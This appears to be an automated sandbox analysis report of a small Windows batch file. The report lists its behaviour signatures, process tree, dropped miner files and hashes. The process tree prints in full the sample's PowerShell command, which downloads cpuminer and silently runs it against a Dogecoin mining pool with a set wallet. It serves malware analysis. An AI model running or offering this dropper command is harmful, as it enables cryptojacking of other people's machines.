b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1792s
max time network
1798s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2024, 18:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	3396	powershell.exe
8	3396	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3676	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3676	cpuminer-sse2.exe
3676	cpuminer-sse2.exe
3676	cpuminer-sse2.exe
3676	cpuminer-sse2.exe
3676	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3396	powershell.exe
3396	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3396	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3864 wrote to memory of 3396	3864	cmd.exe	84
PID 3864 wrote to memory of 3396	3864	cmd.exe	84
PID 3396 wrote to memory of 1044	3396	powershell.exe	92
PID 3396 wrote to memory of 1044	3396	powershell.exe	92
PID 1044 wrote to memory of 3676	1044	cmd.exe	94
PID 1044 wrote to memory of 3676	1044	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3396
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3676

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0el3orp.bq0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
35KB

MD5
7340f40391d22945fc74d70c886a5d26

SHA1
f76ff490e909790f162a53770e694a2c0c8782c3

SHA256
273c475c36d0931472cabf70b7e422f0e7d7c9e2508358b0a2aaa47f73dbf6d9

SHA512
1cbcc54b193cf89190b8544fb2cfd6b7b7f8fe7a14e621d35cf8277c4dd3d260b514031c1c83d07f4415c62cccb6a277289262f2e48fb398912832bb67d22631

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
64KB

MD5
42871db599b90c630b2d75268c8b0116

SHA1
fb3a97b9517d4abe248a7c1a0fe0f528f40b29bc

SHA256
80110dd27dac90724987601037bc7d4bccdce1afd95aeffbfd8cacd813b891cb

SHA512
c32a1b46ab54abcaf179759b2aaa5aeec58a353ebe552b09ce1980ab54a9c702ae1e348c2a9c2020f74fa7c7bfb4d4bac78396f76b6bac04227436deca800438

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
57KB

MD5
9847e73bcb93a91acd165a0f6892b3f6

SHA1
1015d74d21104498e7155841b9e7cd8f66a983c5

SHA256
e324d252f54abb2a57eb723ff7e77015f545af2544a54b9bcacfe2a20ec4abe4

SHA512
f2047bd1599c42d543bd698bd0e6f1df718648169ec08c9a47403b69c5d88a2cdeb388138fafdfa38a4ecbd6f0f54e209357967a3987221351bd44860169f88d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
57KB

MD5
4a91d8f522a86a4a67e44a7667410a6f

SHA1
7ecf2598d4da2b1b105991b2f5a49c8e14e648a4

SHA256
4ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c

SHA512
aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
3.9MB

MD5
6590c9d3cabfdefe14b836e433ff370d

SHA1
64c854ccc0b1652562646a68154ec58207643d2d

SHA256
9a69a4bc622db090f3781c6635ab3df8a5d2b797db82ade463c2fb6132982cbf

SHA512
d5a62fb753e3c3dac0bdc6dd66a222a8316ea38b216cacfcf24f1a6c0d8aa14edbb19b251fa7747816801e87647a2b7a8a7727538838f65feca6db3e778bfc02

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
5.3MB

MD5
002682c7cc11eb4c0bda3b03d9bbd871

SHA1
0decf56eb36747e0fca19614fe1f76a3986f8615

SHA256
98edcad15a98efddc025b6f51a6cd9face4adb316d3562762c24a178c11d8565

SHA512
db946524ee2bcce07cbb45eec8904a80359c8175e484dc0adc72aee958e05cb4917d8fb486dfe138ca90fd48285293179e15f0a93d53d9c5695860de69b7b829

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3396-21-0x00007FF8BCE90000-0x00007FF8BD951000-memory.dmp

Filesize
10.8MB

Download
memory/3396-55-0x00007FF8BCE90000-0x00007FF8BD951000-memory.dmp

Filesize
10.8MB

Download
memory/3396-9-0x0000019659150000-0x0000019659172000-memory.dmp

Filesize
136KB

Download
memory/3396-16-0x000001965B490000-0x000001965B49A000-memory.dmp

Filesize
40KB

Download
memory/3396-15-0x000001965B4B0000-0x000001965B4C2000-memory.dmp

Filesize
72KB

Download
memory/3396-13-0x00000196591D0000-0x00000196591E0000-memory.dmp

Filesize
64KB

Download
memory/3396-12-0x00000196591D0000-0x00000196591E0000-memory.dmp

Filesize
64KB

Download
memory/3396-11-0x00000196591D0000-0x00000196591E0000-memory.dmp

Filesize
64KB

Download
memory/3396-10-0x00007FF8BCE90000-0x00007FF8BD951000-memory.dmp

Filesize
10.8MB

Download
memory/3676-70-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3676-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-71-0x0000000052E60000-0x0000000052EF8000-memory.dmp

Filesize
608KB

Download
memory/3676-72-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/3676-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-69-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3676-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-118-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3676-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download